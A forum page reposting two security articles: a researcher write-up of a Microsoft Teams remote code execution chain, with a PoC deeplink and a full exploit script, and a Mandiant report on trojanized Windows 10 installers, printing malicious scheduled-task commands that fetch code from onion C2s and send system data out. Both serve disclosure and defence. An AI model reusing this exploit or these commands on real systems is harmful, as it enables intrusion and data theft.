-
Posts
18659 -
Joined
-
Last visited
-
Days Won
680
Everything posted by Nytro
-
2022 Microsoft Teams RCE Jan 16, 2023 Me (@adm1nkyj1) and jinmo123 of theori(@jinmo123) participated pwn2own 2022 vancouver but we failed because of time allocation issue but our bug and the exploit was really cool so decided to share on blog! Executive Summary The deeplink handler for /l/task/:appId in Microsoft Teams can load an arbitrary url in webview/iframe. Attacker can leaverage this with teams RPC’s functionality to get code execution outside the sandbox. 1. URL allowlist bypass using url encoding URL Route example ... k(p.states.appDeepLinkTaskModule, { url: "l/task/:appId?url&height&width&title&fallbackURL&card&completionBotId" }), k(p.states.appSfbFreQuickStartVideo, { url: "sfbfrequickstartvideo" }), k(p.states.appDeepLinkMeetingCreate, { url: "l/meeting/new?meetingType&groupId&tenantId&deeplinkId&attendees&subject&content&startTime&endTime&nobyoe&qsdisclaimer" }), k(p.states.appDeepLinkMeetingDetails, { url: "l/meeting/:tenantId/:organizerId/:threadId/:messageId?deeplinkId&nobyoe&qsdisclaimer" }), k(p.states.appDeepLinkMeetingDetailsEventId, { url: "l/meeting/details?eventId&deeplinkId" }), k(p.states.appDeepLinkVirtualEventCreate, { url: "l/virtualevent/new?eventType" }), k(p.states.appDeepLinkVirtualEventDetails, { url: "l/virtualevent/:eventId" }), ... In Microsoft Teams, there is a url route handler for /l/task/:appId which accepts url as a parameter. This allows chat bot created by Teams applications to send a link to user, which should be in the url allowlist. The allowlist is constructed from various fields of app definition: a = angular.isDefined(e.validDomains) ? _.clone(e.validDomains) : []; return e.galleryTabs && a.push.apply(a, _.map(e.galleryTabs, function (e) { return i.getValidDomainFromUrl(e.configurationUrl) })), e.staticTabs && a.push.apply(a, _.map(e.staticTabs, function (e) { return i.getValidDomainFromUrl(e.contentUrl) })), e.connectors && a.push.apply(a, _.map(e.connectors, function (e) { return i.utilityService.parseUrl(e.configurationUrl).host These domains are converted into regular expressions, and are used to validate the url: … www.office.com www.github.com … ```js ... t.prototype.isUrlInDomainList = function(e, t, n) { void 0 === n && (n = !1); for (var i = n ? e : this.parseUrl(e).href, s = 0; s < t.length; s++) { for (var a = "", r = t[s].split("."), o = 0; o < r.length; o++) a += (o > 0 ? "[.]" : "") + r[o].replace("*", "[^/^.]+"); var c = new RegExp("^https://" + a + "((/|\\?).*)?$","i"); if (e.match(c) || i.match(c)) return !0 } return !1 } ... Regardless of the third parameter n, if the original url matches the given regular expression, this check is passed. After checking the url, instead, the parsed form (parseUrl) is passed to webview. e.prototype.setContainerUrl = function(e) { var t = this; this.sdkWindowMessageHandler && (this.sdkWindowMessageHandler.destroy(), this.sdkWindowMessageHandler = null); var n = this.utilityService.parseUrl(e); this.$q.when(this.htmlSanitizer.sanitizeUrl(n.href, ["https"])).then(function(e) { t.frameSrc = e }) } This is problematic because parseUrl of utilityService url-decodes the url; the check is done on the original, url-encoded url. Especially, when an allowlisted domain contains wildcard e.g. *.office.com, the generated regular expression is /^https://[^/^.]+[.]office[.]com((/|\?).*)?$/i. The wildcard becomes [^/^.]+, but if the given url is https://attacker.com%23.office.com, the check is passed. However, after decoding the url, this becomes https://attacker.com#.office.com, which loads attacker.com instead. Microsoft Planner app (appId: 1ded03cb-ece5-4e7c-9f73-61c375528078) has a domain with wildcard in its validDomains field: { "manifestVersion": "1.7", "version": "0.0.19", "categories": [ "Microsoft", "Productivity", "ProjectManagement" ], "disabledScopes": [ "PrivateChannel" ], "developerName": "Microsoft Corporation", "developerUrl": "https://tasks.office.com", "privacyUrl": "https://privacy.microsoft.com/privacystatement", "termsOfUseUrl": "https://www.microsoft.com/servicesagreement", "validDomains": [ "tasks.teams.microsoft.com", "retailservices.teams.microsoft.com", "retailservices-ppe.teams.microsoft.com", "tasks.office.com", "*.office.com" ], ... } As a result, this bug allows the attacker to load an arbitrary location into a webview. PoC: https://teams.live.com/_#/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://attacker.com%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=1&fqdn=teams.live.com 2. pluginHost allows dangerous RPC calls from any webview Since contextIsolation is not enabled on the webview, attacker can leverage prototype pollution to invoke arbitrary electron IPC calls to processes (see Appendix section). Given this primitive, attacker can invoke 'calling:teams:ipc:initPluginHost' IPC call of main process, which gives the id of the pluginHost window. pluginHost exposes dangerous RPC calls to any webview e.g. returning a member of ‘registered objects’, calling them, and importing some allowlisted modules. lib/pluginhost/preload.js: // n, o is controllable P(c.remoteServerMemberGet, (e, t, n, o) => { const i = s.objectsRegistry.get(n); if (null == i) throw new Error( `Cannot get property '${o}' on missing remote object ${n}` ); return A(e, t, () => i[o]); }), // n, o, i is controllable P(c.remoteServerMemberCall, (e, t, n, o, i) => { i = v(e, t, i); const r = s.objectsRegistry.get(n); if (null == r) throw new Error( `Cannot call function '${o}' on missing remote object ${n}` ); return A(e, t, () => r[o](...i)); }), Attacker can get the constructor of any objects, and the constructor of the constructor (Function) to compile arbitrary JavaScript code, and call the compiled function. [_,pluginHost]=ipc.sendSync('calling:teams:ipc:initPluginHost', []); msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{hey: 1}, 1, 'constructor', []], '')[0].id msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'alert()'}]], '')[0].id require() is not exposed to the script itself, but the attacker-controlled script can overwrite prototype of String, which is useful in this code: function loadSlimCore(slimcoreLibPath) { let slimcore; if (utility.isWebpackRuntime()) { const slimcoreLibPathWebpack = slimcoreLibPath.replace(/\\/g, "\\\\"); slimcore = eval(`require('${slimcoreLibPathWebpack}')`); ... } ... function requireEx(e, t) { ... const { slimCoreLibPath: n, error: o } = electron_1.ipcRenderer.sendSync( constants.events.calling.getSlimCoreLibInfo ); if (o) throw new Error(o); if (t === n) return loadSlimCore(n); // n === 'slimcore' throw new Error("Invalid module: " + t); } // y === requireEx P(c.remoteServerRequire, (e, t, n) => A(e, t, () => y(e, n))), If the attacker calls remoteServerRequire with 'slimcore' as an argument, the pluginHost evaluates string returned by String.prototype.replace. Therefore, the following code can invoke require with arbitrary arguments, and call methods in the module. msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";'}]], '')[0].id ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{hey: 1}, msg, []], '') ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{hey: 1}, 'slimcore'], '') By using child_process module, attacker can execute any program. Appendix A: Accessing any bundled modules when contextIsolation is not enabled between preload script and web pages Electron compiles and executes a script named sandbox_bundle.js in every sandboxed frame, and it registers a handler that shows security warnings if user wants. To enable the security warning, users can set ELECTRON_ENABLE_SECURITY_WARNINGS either in environment variables or window. lib/renderer/security-warnings.ts#L43-L46: if ((env && env.ELECTRON_ENABLE_SECURITY_WARNINGS) || (window && window.ELECTRON_ENABLE_SECURITY_WARNINGS)) { shouldLog = true; } This is called on ‘load’ event of the window: export function securityWarnings (nodeIntegration: boolean) { const loadHandler = async function () { if (shouldLogSecurityWarnings()) { const webPreferences = await getWebPreferences(); logSecurityWarnings(webPreferences, nodeIntegration); } }; window.addEventListener('load', loadHandler, { once: true }); } security-warnings.ts is also bundled to sandbox_bundle.js using webpack. There is an import of webFrame, which lazily loads the “./lib/renderer/api/web-frame.ts”. import { webFrame } from 'electron'; ... const isUnsafeEvalEnabled = () => { return webFrame._isEvalAllowed(); }; // this is called by warnAboutInsecureCSP + logSecurityWarnings This is done by electron.ts: import { defineProperties } from '@electron/internal/common/define-properties'; import { moduleList } from '@electron/internal/sandboxed_renderer/api/module-list'; module.exports = {}; defineProperties(module.exports, moduleList); In define-properties.ts, it defines getter for all modules in moduleList; loader is invoked when a module e.g. webFrame is accessed. const handleESModule = (loader: ElectronInternal.ModuleLoader) => () => { const value = loader(); if (value.__esModule && value.default) return value.default; return value; }; // Attaches properties to |targetExports|. export function defineProperties (targetExports: Object, moduleList: ElectronInternal.ModuleEntry[]) { const descriptors: PropertyDescriptorMap = {}; for (const module of moduleList) { descriptors[module.name] = { enumerable: !module.private, get: handleESModule(module.loader) }; } return Object.defineProperties(targetExports, descriptors); } The loader for webFrame is defined in the moduleList: export const moduleList: ElectronInternal.ModuleEntry[] = [ { ... { name: 'webFrame', loader: () => require('@electron/internal/renderer/api/web-frame') }, Which is compiled as: }, { name: "webFrame", loader: ()=>r(/*! @electron/internal/renderer/api/web-frame */ "./lib/renderer/api/web-frame.ts") }, { The function r above is __webpack_require__, which actually loads the module if not loaded yet. function __webpack_require__(r) { if (t[r]) return t[r].exports; Here, t is the list of cached modules. If the module is not loaded by any code, t[r] is undefined. Also, t.__proto__ points Object.prototype, so attacker can install getter for the module path to get the whole list of cached modules. const KEY = './lib/renderer/api/web-frame.ts'; let modules; Object.prototype.__defineGetter__(KEY, function () { console.log(this); modules = this; delete Object.prototype[KEY]; main(); }) This enables attacker to get the @electron/internal/renderer/api/ipc-renderer module to send any IPCs to any processes. var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default; [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []); We utilized this to send IPC to pluginHost (see Section 2), and execute a program outside the sandbox. Exploit Client : https://teams.live.com/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://0e1%2Ekr\cd2c4753c4cb873c7be66e3ffdeae71f71ce33482e9921bab01dc3670a3b4f95\%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=&fqdn=teams.live.com Server : <script> const KEY = './lib/renderer/api/web-frame.ts'; let modules; Object.prototype.__defineGetter__(KEY, function () { console.log(this); modules = this; delete Object.prototype[KEY]; main(); }) window.ELECTRON_ENABLE_SECURITY_WARNINGS = true; function main() { var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default; [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []); msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '')[0] msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{ hey: 1 }, msg.id, 'constructor', []], '')[0] msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{ hey: 1 }, msg.id, 'constructor', [{ type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";' }]], '')[0] ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{ hey: 1 }, msg.id, []], '') msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '') } </script> Sursa: https://blog.pksecurity.io/2023/01/16/2022-microsoft-teams-rce.html
-
- 1
-
Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government MANDIANT INTELLIGENCE DEC 15, 2022 16 MIN READ Executive Summary Mandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 Operating System installers. These were distributed via torrent sites in a supply chain attack. Threat activity tracked as UNC4166 likely trojanized and distributed malicious Windows Operating system installers which drop malware that conducts reconnaissance and deploys additional capability on some victims to conduct data theft. The trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise targets selected for follow on activity included multiple Ukrainian government organizations. At this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166’s targets overlap with organizations targeted by GRU related clusters with wipers at the outset of the war. Threat Detail Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors. One trojanized ISO “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) uses the Ukrainian Language pack and could be downloaded from “https://toloka[.]to/t657016#1873175.” The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1). The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image. The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022. Figure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Attribution and Targeting Mandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest. Mandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government. The organizations where UNC4166 conducted follow on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion. This ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker” which was created on the May 11, 2022. The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification. There was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers. Outlook and Implications Supply chain operations can be leveraged for broad access, as in the case of NotPetya, or the ability to discreetly select high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone. For more research from Google Cloud on securing the supply chain, see this Perspectives on Security report. Technical Annex Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking. In some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users including the deployment of the STOWAWAY and BEACON backdoors. STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering. BEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C2 server via HTTP or DNS. The threat actor also began to deploy secondary toehold backdoors in the environment including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps. SPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process. Details Infection Vector Mandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian Language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded schedule task to determine whether the victim should have further payloads deployed. Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Malicious trojanized Windows 10 installer Downloaded from https://toloka.to/t657016#1873175 Forensic analysis on the ISO identified the changes made by UNC4166 that enables the threat actor to perform additional triage of victim accounts: Modification of the GatherNetworkInfo and Consolidator Schedule Tasks The ISO contained altered GatherNetworkInfo and Consolidator schedule tasks, which added a secondary action that executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and execute the gatherNetworkInfo.vbs script or waqmcons.exe process. Figure 2: Legitimate GatherNetworkInfo task configuration The altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell. The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws). These tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow on threat activity. Figure 3: Trojanized GatherNetworkInfo task configuration Based on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows: C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) Last edit date: 2022-05-11 12:58:55 Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID))) C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) Last edit date: 2022-05-11 12:58:12 Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe Note: At the time of analysis, the onion[.]ws C2 server is redirecting requests to legitimate websites. Software Piracy Script The ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd. SetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows installation but before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid) with the addition of a command to disable OneDriveSetup which was not identified in either script. The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the Windows license. Forensic artifacts led Mandiant to identify three additional scripts that were historically on the image, we assess that over time the threat actor has made alterations to these files. SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669) Batch script to disable legitimate services and activate Windows File currently hosted on ISO SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving Victim Identification Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY. The threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests both to download tasking and upload stolen data/responses. The threat actor’s playbook appears to follow a distinct pattern: Execute a command Optionally, filter or expand the results Export the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%\sysinfo) Optionally, compress the data into sysinfo.zip (%system32%\sysinfo.zip) Optionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed at the next beacon). Mandiant identified the threat actor exfiltrate data containing system information data, directory listings including timestamps and device geo-location. A list of commands used can be found in the indicators section. Interestingly, we did uncover a command that didn’t fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks. curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile –output temp.zip Although we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it’s unclear why they wouldn’t deploy the command directly.. chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo The download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value. It’s unclear why the threat actor performed this additional request in favor of downloading the command itself; we believe this may be used as a default command by the threat actors. Follow On Tasking If UNC4166 determined a device likely contained intelligence of value, subsequent actions were take on these devices. Based on our analysis, the subsequent tasking fall into three categories: Deployment of tools to enable exfiltration of data (like TOR and Sheret) Deployment of additional lightweight backdoors likely to provide redundant access to the target (like SPAREPART) Deployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY) TOR Browser Downloaded In some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the victim’s device. This was originally attempted through downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second TOR installer directly from the official torprojects.org website. It’s unclear why the threat actor performed these actions as Mandiant was unable to identify any use of TOR on the victim device, although this would provide the actor a second route to communicate with infrastructure through TOR or may be used by additional capability as a route for exfiltration. We also discovered the TOR installer was also hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device. bundle.zip (MD5: 66da9976c96803996fc5465decf87630) Legitimate TOR Installer bundle Downloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip Downloaded from https:// 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip Use of Sheret HTTP Server and localhost[.]run In some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices. The threat actor configured Sheret to server locally, then using SSH created a tunnel from the local device to the service localhost[.]run. In at least one instance, this web server was used for serving files on a removable drive connected to the victim device and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism. The command used for SSH tunnelling was: ssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no >> sysinfo This command configures the local system to create a tunnel from the local device to the website localhost.run. C:\Windows\System32\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d) Sheret web server Publicly available as a build from https://github.com/ethanpil/sheret Compiled date: 1970/01/01 00:00:00 Deployment of SPAREPART, Likely as a Redundant Backdoor We identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute %SYSTEM32%\MicrosoftDeliveryNetwork\MicrosoftDeliveryCenter with the arguments “56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the Windows SC command. Functionally SPAREPART is identical to the PowerShell backdoors that were deployed via the schedule tasks in the original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the tasking and execute via piping the commands into the PowerShell process. SPAREPART will parse the raw SMIBOS firmware table via the Windows GetSystemFirmwareTable, this code is nearly identical to code published by Microsoft on Github. The code’s purpose is to obtain the UUID of the device, which is later formatted into the same header (h: <UUID) for use in communications with the C2 server. Figure 4: SPAREPART formatting of header The payload parses the arguments provided on the command line. Interestingly there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second command (in our instance powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument which will mean that the payload is unable to execute commands provided by the threat actor. Figure 5: SPAREPART parsing threat actor input SPAREPART has a unique randomization for its sleep timer. This enables the threat actor to randomise beaconing timing. The randomisation is seeded of the base address of the image in memory, this value is then used to determine a value between 0 and 59. This value acts as the sleep timer in minutes. As the backdoor starts up, it’ll sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours. If after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed. Figure 6: SPAREPART randomizing the time for next beacon After the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. The payload attempts to perform a GET request using the previously formatted headers, providing the response is a valid status (200), the data will be read and written to a previously created pipe. Figure 7: SPAREPART downloading payload If a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands as the standard input. The payload makes no attempt to return the response to the actor, similarly to the PowerShell backdoor. Figure 8: SPAREPART executing a command Although we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor loses access to the original schedule tasks. MicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8) SPAREPART backdoor Compiled on: 2022/11/28 02:32:33 PDB path: C:\Users\user\Desktop\ImageAgent\ImageAgent\PreAgent\src\builder\agent.pdb Deployment of Additional Backdoors In addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some limited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a schedule task named AzureSync on at least one device. The schedule task was configured to execute AzureSync via rundll32.exe. AzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on the June 24, 2022 with an SSL certificate from Let’s Encrypt dated the 26th of August 2022. C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) BEACON backdoor Original name: tr2fe.dll Compiled on: 1970/01/01 00:00:00 Dropped by 529388109f4d69ce5314423242947c31 (BEACON) Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn Due to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified the threat actor had deployed a STOWAWAY backdoor on the victim device. C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 193.142.30.166:443 %LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 91.205.230.66:8443 Indicators Scheduled Tasks C:\Windows\System32\Tasks\MicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d) Schedule task configured to execute Powershell.exe with the command line curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell Trojanized Scheduled Tasks C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) BEACON Backdoor C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) Scheduled Tasks for Persistence C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSync C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSyncDaily STOWAWAY Backdoor C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) %LOCALAPPDATA%\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) Services for Persistence Printer driver host for applications SODUsvc On Host Recon Commands Get-ChildItem -Recurse -Force -Path ((C:)+’') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force; Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8 invoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8 Get-Volume | Where-Object {.DriveLetter -and .DriveLetter -ne ‘C’ -and .DriveType -eq ‘Fixed’} | ForEach-Object {Get-ChildItem -Recurse -Directory (.DriveLetter+‘:’) | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H (’h:’+(wmic csproduct get UUID)) –data-binary ‘@sysinfo.zip’ -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo Trojanized Windows Image Network Indicators Indicators of Compromise Signature 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws Malicious Windows Image Tor C2 BEACON C2s https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– https://cdnworld[.]org/34702–general/sync/42823419-cdn STOWAWAY C2s 193.142.30[.]166:443 91.205.230[.]66:8443 Appendix MITRE ATT&CK Framework ATT&CK Tactic Category Techniques Initial Access T1195.002: Compromise Software Supply Chain Persistence T1136: Create Account T1543.003: Windows Service Discovery T1049: System Network Connections Discovery Execution T1047: Windows Management Instrumentation T1059: Command and Scripting Interpreter T1059.001: 